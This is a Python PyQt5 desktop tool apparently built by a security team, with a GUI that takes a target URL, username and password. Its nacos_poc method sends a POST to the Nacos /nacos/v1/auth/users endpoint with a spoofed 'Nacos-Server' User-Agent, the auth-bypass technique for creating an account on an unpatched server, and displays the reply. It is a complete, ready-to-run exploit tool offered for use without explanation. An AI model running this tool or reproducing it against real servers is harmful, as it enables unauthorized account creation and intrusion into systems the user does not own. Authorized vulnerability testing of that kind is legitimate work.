# -*- coding: utf-8 -*-
import sys

import requests
import self
# Form implementation generated from reading ui file 'backup0.bak.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QAbstractItemView

import nacos


class Ui_Form(object):
    def setupUi(self, Form):
        Form.setObjectName("Form")

        Form.resize(538, 317)
        Form.setMinimumSize(QtCore.QSize(538, 317))
        Form.setMaximumSize(QtCore.QSize(538, 317))
        self.pushButton = QtWidgets.QPushButton(Form)
        self.pushButton.setGeometry(QtCore.QRect(340, 110, 161, 61))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(12)
        self.pushButton.setFont(font)
        self.pushButton.setStyleSheet("color:blue")
        self.pushButton.setObjectName("pushButton")
        self.lineEdit_wangzhi = QtWidgets.QLineEdit(Form)
        self.lineEdit_wangzhi.setGeometry(QtCore.QRect(120, 20, 391, 41))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.lineEdit_wangzhi.setFont(font)
        self.lineEdit_wangzhi.setObjectName("lineEdit_wangzhi")
        self.label_wangzhan = QtWidgets.QLabel(Form)
        self.label_wangzhan.setGeometry(QtCore.QRect(20, 30, 101, 16))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(12)
        self.label_wangzhan.setFont(font)
        self.label_wangzhan.setStyleSheet("color:blue")
        self.label_wangzhan.setIndent(-1)
        self.label_wangzhan.setObjectName("label_wangzhan")
        self.label_username = QtWidgets.QLabel(Form)
        self.label_username.setGeometry(QtCore.QRect(30, 100, 91, 16))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(12)
        self.label_username.setFont(font)
        self.label_username.setStyleSheet("color:blue")
        self.label_username.setObjectName("label_username")
        self.label_password = QtWidgets.QLabel(Form)
        self.label_password.setGeometry(QtCore.QRect(30, 160, 81, 31))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(12)
        self.label_password.setFont(font)
        self.label_password.setStyleSheet("color:blue")
        self.label_password.setObjectName("label_password")
        self.lineEdit_username = QtWidgets.QLineEdit(Form)
        self.lineEdit_username.setGeometry(QtCore.QRect(120, 90, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.lineEdit_username.setFont(font)
        self.lineEdit_username.setObjectName("lineEdit_username")
        self.lineEdit_password = QtWidgets.QLineEdit(Form)
        self.lineEdit_password.setGeometry(QtCore.QRect(120, 150, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.lineEdit_password.setFont(font)
        self.lineEdit_password.setObjectName("lineEdit_password")
        self.label_result = QtWidgets.QLabel(Form)
        self.label_result.setGeometry(QtCore.QRect(40, 250, 81, 21))
        font = QtGui.QFont()
        font.setFamily("黑体")
        self.label_result.setFont(font)
        self.label_result.setStyleSheet("color:blue")
        self.label_result.setObjectName("label_result")

        self.textBrowser = QtWidgets.QTextBrowser(Form)
        self.textBrowser.setGeometry(QtCore.QRect(120, 220, 381, 81))
        font = QtGui.QFont()
        font.setFamily("黑体")
        self.textBrowser.setFont(font)
        self.textBrowser.setStyleSheet("color:blue")
        self.textBrowser.setObjectName("textBrowser")



        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
        self.pushButton.clicked.connect(self.nacos_poc)

    def retranslateUi(self, Form):
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "ATM团队-Nacos"))
        self.pushButton.setText(_translate("Form", "开始测试"))
        self.label_wangzhan.setText(_translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">请输入网址</span></p></body></html>"))
        self.label_username.setText(_translate("Form", "<html><head/><body><p><span style=\" font-size:12pt; font-weight:600;\">username</span></p></body></html>"))
        self.label_password.setText(_translate("Form", "<html><head/><body><p><span style=\" font-size:12pt; font-weight:600;\">password</span></p></body></html>"))
        self.label_result.setText(_translate("Form", "<html><head/><body><p><span style=\" font-size:12pt; font-weight:600;\">回显结果</span></p></body></html>"))

    def nacos_poc(self):
        # input("请输入url")
        # url = input("请输入网址：") + '/nacos/v1/auth/users?'
        url = self.lineEdit_wangzhi.text() + '/nacos/v1/auth/users?'
        headers = {
            'User-Agent': 'Nacos-Server'
        }
        data = {
            'username': self.lineEdit_username.text(),
            'password': self.lineEdit_password.text()
        }
        #输出服务其的信息，定义一个变量500的
        error_info=""
        try:
            res = requests.post(url, headers=headers, data=data)
            info = res.text
            #打印输出框
            self.textBrowser.setText(str(info))
        except Exception as e:
            error_info=str(e)
            print(self.textBrowser.setText(error_info))
        # finally:
        #     self.textBrowser.setText(error_info)
if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    app.setWindowIcon(QIcon('./favicon.ico'))
    window = QtWidgets.QMainWindow()
    ui = Ui_Form()
    ui.setupUi(window)
    window.show()
    sys.exit(app.exec_())